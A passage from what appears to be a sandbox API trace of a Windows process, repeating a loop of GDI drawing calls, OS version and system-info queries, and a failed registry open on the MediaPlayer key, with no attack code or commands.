wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.658] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.658] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.659] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.659] BeginPath (hdc=0x0) returned 0 [0087.659] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.659] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.659] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.659] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.659] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.659] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.659] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.659] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.659] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1b0401d6 [0087.659] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1d0401d3 [0087.659] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104094e [0087.659] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104094f [0087.659] CombineRgn (hrgnDst=0x104094e, hrgnSrc1=0x1b0401d6, hrgnSrc2=0x1d0401d3, iMode=1) returned 1 [0087.659] CombineRgn (hrgnDst=0x104094f, hrgnSrc1=0x1b0401d6, hrgnSrc2=0x1d0401d3, iMode=4) returned 2 [0087.659] CreateSolidBrush (color=0xff) returned 0x210094d [0087.659] CreateSolidBrush (color=0xff0000) returned 0x1100950 [0087.659] DeleteObject (ho=0x1100950) returned 1 [0087.659] DeleteObject (ho=0x1d0401d3) returned 1 [0087.659] DeleteObject (ho=0x1b0401d6) returned 1 [0087.659] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.659] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.659] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.659] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.659] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.659] BeginPath (hdc=0x0) returned 0 [0087.659] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.659] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.659] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.659] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.659] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.659] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.659] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.659] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.659] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1e0401d3 [0087.659] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1c0401d6 [0087.659] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040951 [0087.660] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040952 [0087.660] CombineRgn (hrgnDst=0x1040951, hrgnSrc1=0x1e0401d3, hrgnSrc2=0x1c0401d6, iMode=1) returned 1 [0087.660] CombineRgn (hrgnDst=0x1040952, hrgnSrc1=0x1e0401d3, hrgnSrc2=0x1c0401d6, iMode=4) returned 2 [0087.660] CreateSolidBrush (color=0xff) returned 0x2100950 [0087.660] CreateSolidBrush (color=0xff0000) returned 0x1100953 [0087.660] DeleteObject (ho=0x1100953) returned 1 [0087.660] DeleteObject (ho=0x1c0401d6) returned 1 [0087.660] DeleteObject (ho=0x1e0401d3) returned 1 [0087.660] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.660] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.660] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.660] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.660] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.660] BeginPath (hdc=0x0) returned 0 [0087.660] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.660] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.660] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.660] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.660] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.660] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.660] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.660] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.660] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1d0401d6 [0087.660] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1f0401d3 [0087.660] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040954 [0087.660] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040955 [0087.660] CombineRgn (hrgnDst=0x1040954, hrgnSrc1=0x1d0401d6, hrgnSrc2=0x1f0401d3, iMode=1) returned 1 [0087.660] CombineRgn (hrgnDst=0x1040955, hrgnSrc1=0x1d0401d6, hrgnSrc2=0x1f0401d3, iMode=4) returned 2 [0087.660] CreateSolidBrush (color=0xff) returned 0x2100953 [0087.660] CreateSolidBrush (color=0xff0000) returned 0x1100956 [0087.660] DeleteObject (ho=0x1100956) returned 1 [0087.660] DeleteObject (ho=0x1f0401d3) returned 1 [0087.660] DeleteObject (ho=0x1d0401d6) returned 1 [0087.660] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.660] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.660] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.660] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.660] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.660] BeginPath (hdc=0x0) returned 0 [0087.661] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.661] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.661] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.661] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.661] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.661] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.661] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.661] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.661] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x200401d3 [0087.661] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1e0401d6 [0087.661] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040957 [0087.661] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040958 [0087.661] CombineRgn (hrgnDst=0x1040957, hrgnSrc1=0x200401d3, hrgnSrc2=0x1e0401d6, iMode=1) returned 1 [0087.661] CombineRgn (hrgnDst=0x1040958, hrgnSrc1=0x200401d3, hrgnSrc2=0x1e0401d6, iMode=4) returned 2 [0087.661] CreateSolidBrush (color=0xff) returned 0x2100956 [0087.661] CreateSolidBrush (color=0xff0000) returned 0x1100959 [0087.661] DeleteObject (ho=0x1100959) returned 1 [0087.661] DeleteObject (ho=0x1e0401d6) returned 1 [0087.661] DeleteObject (ho=0x200401d3) returned 1 [0087.661] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.661] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.661] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.661] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.661] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.661] BeginPath (hdc=0x0) returned 0 [0087.661] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.661] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.661] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.661] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.661] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.661] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.661] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.661] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.694] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1f0401d6 [0087.694] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x210401d3 [0087.694] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409f3 [0087.694] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409f4 [0087.694] CombineRgn (hrgnDst=0x10409f3, hrgnSrc1=0x1f0401d6, hrgnSrc2=0x210401d3, iMode=1) returned 1 [0087.694] CombineRgn (hrgnDst=0x10409f4, hrgnSrc1=0x1f0401d6, hrgnSrc2=0x210401d3, iMode=4) returned 2 [0087.694] CreateSolidBrush (color=0xff) returned 0x2100959 [0087.694] CreateSolidBrush (color=0xff0000) returned 0x11009f5 [0087.694] DeleteObject (ho=0x11009f5) returned 1 [0087.694] DeleteObject (ho=0x210401d3) returned 1 [0087.694] DeleteObject (ho=0x1f0401d6) returned 1 [0087.694] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.694] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.695] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.695] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.695] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.695] BeginPath (hdc=0x0) returned 0 [0087.695] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.695] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.695] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.695] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.695] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.695] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.695] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.695] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.695] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x220401d3 [0087.695] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x200401d6 [0087.695] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409f6 [0087.695] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409f7 [0087.695] CombineRgn (hrgnDst=0x10409f6, hrgnSrc1=0x220401d3, hrgnSrc2=0x200401d6, iMode=1) returned 1 [0087.695] CombineRgn (hrgnDst=0x10409f7, hrgnSrc1=0x220401d3, hrgnSrc2=0x200401d6, iMode=4) returned 2 [0087.695] CreateSolidBrush (color=0xff) returned 0x21009f5 [0087.695] CreateSolidBrush (color=0xff0000) returned 0x11009f8 [0087.695] DeleteObject (ho=0x11009f8) returned 1 [0087.695] DeleteObject (ho=0x200401d6) returned 1 [0087.695] DeleteObject (ho=0x220401d3) returned 1 [0087.695] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.695] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.695] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.695] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.695] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.695] BeginPath (hdc=0x0) returned 0 [0087.695] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.695] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.695] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.695] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.695] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.695] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.695] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.695] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.696] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x210401d6 [0087.696] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x230401d3 [0087.696] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409f9 [0087.696] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409fa [0087.696] CombineRgn (hrgnDst=0x10409f9, hrgnSrc1=0x210401d6, hrgnSrc2=0x230401d3, iMode=1) returned 1 [0087.696] CombineRgn (hrgnDst=0x10409fa, hrgnSrc1=0x210401d6, hrgnSrc2=0x230401d3, iMode=4) returned 2 [0087.696] CreateSolidBrush (color=0xff) returned 0x21009f8 [0087.696] CreateSolidBrush (color=0xff0000) returned 0x11009fb [0087.696] DeleteObject (ho=0x11009fb) returned 1 [0087.696] DeleteObject (ho=0x230401d3) returned 1 [0087.696] DeleteObject (ho=0x210401d6) returned 1 [0087.696] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.696] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.696] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.696] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.696] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.696] BeginPath (hdc=0x0) returned 0 [0087.696] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.696] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.696] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.696] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.696] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.696] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.696] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.696] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.696] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x240401d3 [0087.696] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x220401d6 [0087.696] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409fc [0087.696] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409fd [0087.696] CombineRgn (hrgnDst=0x10409fc, hrgnSrc1=0x240401d3, hrgnSrc2=0x220401d6, iMode=1) returned 1 [0087.696] CombineRgn (hrgnDst=0x10409fd, hrgnSrc1=0x240401d3, hrgnSrc2=0x220401d6, iMode=4) returned 2 [0087.696] CreateSolidBrush (color=0xff) returned 0x21009fb [0087.696] CreateSolidBrush (color=0xff0000) returned 0x11009fe [0087.696] DeleteObject (ho=0x11009fe) returned 1 [0087.696] DeleteObject (ho=0x220401d6) returned 1 [0087.696] DeleteObject (ho=0x240401d3) returned 1 [0087.696] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.696] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.696] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.696] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.697] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.697] BeginPath (hdc=0x0) returned 0 [0087.697] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.697] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.697] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.697] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.697] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.697] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.697] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.697] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.697] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x230401d6 [0087.697] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x250401d3 [0087.697] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409ff [0087.697] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a00 [0087.697] CombineRgn (hrgnDst=0x10409ff, hrgnSrc1=0x230401d6, hrgnSrc2=0x250401d3, iMode=1) returned 1 [0087.697] CombineRgn (hrgnDst=0x1040a00, hrgnSrc1=0x230401d6, hrgnSrc2=0x250401d3, iMode=4) returned 2 [0087.697] CreateSolidBrush (color=0xff) returned 0x21009fe [0087.697] CreateSolidBrush (color=0xff0000) returned 0x1100a01 [0087.697] DeleteObject (ho=0x1100a01) returned 1 [0087.697] DeleteObject (ho=0x250401d3) returned 1 [0087.697] DeleteObject (ho=0x230401d6) returned 1 [0087.697] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.697] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.697] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.697] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.697] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.697] BeginPath (hdc=0x0) returned 0 [0087.697] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.697] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.697] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.697] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.697] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: 